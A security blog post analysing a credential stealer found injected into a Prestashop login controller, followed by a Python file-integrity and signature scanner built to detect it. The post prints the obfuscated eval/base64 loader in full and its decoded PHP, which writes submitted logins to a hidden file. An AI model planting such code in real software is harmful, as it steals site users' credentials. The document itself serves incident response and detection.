In a compromised environment, attackers may inject malicious code into different files, including the core files of various CMSs, in order to maintain access to the website and/or obtain sensitive data. Although these issues are very simple to identify and remediate, not all users constantly monitor their websites for such file integrity breaches.
One of these injections is known as a credential stealer: it intercepts the authentication mechanism and saves the submitted username/password either into a file or sends it via email to the attacker.
During an Incident Response process, we found malware of this category injected into the Prestashop file “./controllers/AuthController.php”. Here is the snippet:
```php
if (Tools::isSubmit('SubmitLogin'))
{
    Module::hookExec('beforeAuthentication');
    $passwd = trim(Tools::getValue('passwd'));
    $email = trim(Tools::getValue('email'));
    if (empty($email))
        $this->errors[] = Tools::displayError('E-mail address required');
    ...
    elseif (Tools::strlen($passwd) > 32)
        $this->errors[] = Tools::displayError('Password is too long');
    elseif (!Validate::isPasswd($passwd))
        $this->errors[] = Tools::displayError('Invalid password');
    else
    {
        // injected line (highlighted in the original post)
        eval(gzinflate(base64_decode('bY7fCoIwHIXvBd9BfnihIL5AJkiuuilj2R+IGGYbLsyNzVDI3j016Kbuzsf5OBzOHPao8pqLitCW61o7wISkFbju0zRsJqcjOhDdsnYmqlqJsqTKl4UEDzJwJ6bBGsVr6vHSB6vrLPBtmWndXL9ItgjvET7BMk035EjmCT5EOEbxkOD862G0SlJEojj+W48zu55ItEDrdFCCiwqDQoWfZ3kp9PhsoNcb')));
        $customer = new Customer();
        $authentication = $customer->getByEmail(trim($email), trim($passwd));
        if (!$authentication OR !$customer->id)
```
Obfuscation of this kind is a very common technique attackers use to hide malicious code, but most scanners will trigger an alert for files containing the combination of eval() and base64_decode().
After decoding it, we could see the following snippet:
```php
if (function_exists("fopen")) {
    // appends the submitted email/password plus client IP and user agent to AjaxController.php
    $fp = fopen("AjaxController.php", "a");
    fwrite($fp, $email . " || " . $passwd . " || " . $_SERVER["HTTP_X_FORWARDED_FOR"] . " || " . $_SERVER["REMOTE_ADDR"] . " || " . $_SERVER["HTTP_USER_AGENT"] . "<br><hr>");
    fclose($fp);
}
```
The code above runs whenever a user tries to authenticate on Prestashop’s backend, dumping sensitive data such as the email, password, IP address and user agent into the file AjaxController.php.
From there, all the attacker has to do is download this file to get a list of credentials and take control of the site: create bogus users, change payment information, and/or perform all kinds of other malicious activities.
In a previous blog post about another credential stealer, we showed how an attacker can send stolen credentials to an email address. The case described in this article, though, tends to be simpler and more reliable, because no email account is needed for it to succeed.
To prevent such attacks, keep your Prestashop site and its modules up to date and remember to monitor your core files. If you suspect that your site has been compromised and you need specialized assistance, our security analysts at https://sucuri.net will be glad to help.
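The two defensive checks mentioned above, a file integrity baseline for the core files and a scanner signature for the eval()/decoder combination, are shown together in the following added example. It is not Sucuri's code or part of Prestashop; it assumes a Prestashop-style tree of .php files, builds a SHA-256 baseline while the site is known clean, and later reports files that were modified or added and files that match the obfuscation pattern. The sample tree, the placeholder base64 payload and the drop file location (controllers/AjaxController.php) are constructed for the demonstration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Signatures for the eval()+decoder combination described in the post
# (constructed list; extend as needed). Each entry is (name, compiled regex).
SIGNATURES = [
    ("eval_of_decoder",
     re.compile(r"\beval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I)),
    ("long_base64_literal",
     re.compile(r"\bbase64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]", re.I)),
]


def sha256_file(path):
    """Hash a file in chunks so large core files need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map each .php file (relative POSIX path) under root to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*.php"))}


def diff_baseline(root, baseline):
    """Compare the tree against a stored baseline; every change deserves review."""
    current = build_baseline(root)
    return {
        "modified": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def scan_for_obfuscation(root):
    """Return {relative path: [signature names]} for files matching a signature."""
    root = Path(root)
    hits = {}
    for p in sorted(root.rglob("*.php")):
        text = p.read_text(encoding="utf-8", errors="replace")
        names = [name for name, rx in SIGNATURES if rx.search(text)]
        if names:
            hits[p.relative_to(root).as_posix()] = names
    return hits


def demo():
    """Constructed scenario: baseline a clean tree, simulate the injection, detect it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        ctrl = root / "controllers"
        ctrl.mkdir()
        auth = ctrl / "AuthController.php"
        auth.write_text(
            "<?php\nif (Tools::isSubmit('SubmitLogin')) {\n"
            "    $passwd = trim(Tools::getValue('passwd'));\n}\n",
            encoding="utf-8",
        )
        baseline = build_baseline(root)  # taken while the site is known clean

        # Simulate the compromise: an eval(gzinflate(base64_decode(...))) line is
        # appended (the payload is a placeholder string, not the real one) and the
        # stealer's drop file appears next to the controllers (assumed location).
        auth.write_text(auth.read_text(encoding="utf-8")
                        + "eval(gzinflate(base64_decode('UExBQ0VIT0xERVI=')));\n",
                        encoding="utf-8")
        (ctrl / "AjaxController.php").write_text(
            "constructed dump line || 203.0.113.5<br><hr>\n", encoding="utf-8")

        return {"diff": diff_baseline(root, baseline),
                "hits": scan_for_obfuscation(root)}


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

In practice the baseline dictionary is stored outside the web root (or compared against hashes of a pristine release of the same version) and the two checks run from cron; the integrity diff catches the drop file, which contains no eval() at all and so would never trip a signature scanner, while the signature catches the injected loader even in a file whose baseline was never recorded.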